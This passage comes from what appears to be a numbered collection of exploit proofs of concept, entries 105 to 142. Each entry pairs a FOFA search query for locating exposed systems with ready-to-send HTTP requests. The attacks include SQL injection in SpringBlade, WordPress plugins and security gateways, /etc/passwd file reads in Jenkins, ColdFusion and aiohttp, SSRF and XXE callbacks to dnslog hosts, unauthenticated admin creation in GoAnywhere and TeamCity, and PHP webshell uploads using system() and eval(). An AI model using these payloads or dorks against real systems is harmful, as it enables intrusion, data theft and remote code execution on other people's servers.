Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: replace with your own token
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Byzoro (百绰智能) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Access /home/src.php
119. Beijing Byzoro (百绰智能) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account/password is admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Byzoro (百绰智能) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Beijing Byzoro (百绰智能) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php
122. 北京百绰智能 S200 management platform importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter is the base64 encoding (not encryption) of the statement to run: c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to select 1,database(),version(). The endpoint executes the decoded statement as given, so log and WAF matching has to be done on the decoded text, not on the encoded form.
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

The command output is returned in the X-Cmd-Response response header rather than in the body, so inspect the headers when replaying.

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

The handler writes fileContent verbatim to the name given in filePath, inside the web-served /Scripts/ directory; the written file is then reachable at http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console with it; system commands can then be executed from there.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Browsers and most HTTP clients collapse the ../ segments before sending; replay with a raw socket or with curl --path-as-is so the path reaches the server as written.

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

The PoC is blind: replace the dnslog host with one you control and confirm through the DNS or HTTP callback, not through the HTTP response.

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 Update 17 and earlier, 2021 Update 7 and earlier, 2023 Update 1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD (omitted for length; see the note at the top of the page)

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 as a request header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

Step 1 needs the CFIDE admin API to be reachable; where /CFIDE is blocked at the reverse proxy (standard ColdFusion hardening), the chain stops there.

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

The only identity in the request is the user_name/user_id cookie pair, values the client sets itself; the client-supplied Content-Type image/png is not checked against the body.

131. Mini-Tmall <= 20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

Time-based blind: the orderBy value lands in the ORDER BY clause, and the response is delayed by about 3 seconds when the database name is 11 characters long.

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

The request creates a user with the SYSTEM_ADMIN role without any prior authentication: the ;.jsp suffix makes the authentication check treat the forwarded path as a static .jsp resource, while the servlet container strips ;.jsp before routing to /app/rest/users.

CVE-2024-27199
Authentication is also skipped for the following paths, which reach the admin diagnostics page by traversing out of an allow-listed prefix:
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

Script referenced: CVE-2024-27198-RCE.py

133. H5 云商城 file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

The path is reproduced as given on the page, including the spelling commodtiy; the uploaded script deletes itself after one execution (unlink(__FILE__)).


134. 网康 NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

Error-based (updatexml): the MySQL version string comes back inside the XPATH syntax error. messagecontent is a JSON string nested inside JSON, so the escaped quotes around IPAddr must stay exactly as shown.

135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Error-based (extractvalue): when the injection works the response contains the MD5 of 102103122 between the ~ markers.

136. NextChat CORS proxy SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The /api/cors/ route fetches whatever URL follows it; the trailing %23 (#) turns anything the server appends into a URL fragment. A callback at the dnslog host confirms the SSRF.

137. 福建科立讯 communication command-and-dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

Entries 137 to 140 are time-based blind injections (SLEEP(5)) in different endpoints of the same product; a response delayed by roughly 5 seconds relative to a baseline request is the indicator. The page gives no version boundary, so treat every exposed instance as in scope until the vendor confirms otherwise.

138. 福建科立讯 communication command-and-dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communication command-and-dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communication command-and-dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 福建科立讯 communication command-and-dispatch platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

UNION-based: the MD5 of 1 (c4ca4238a0b923820dcc509a6f75849b) appears between the ~ markers in the response when the column count of five is right.

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
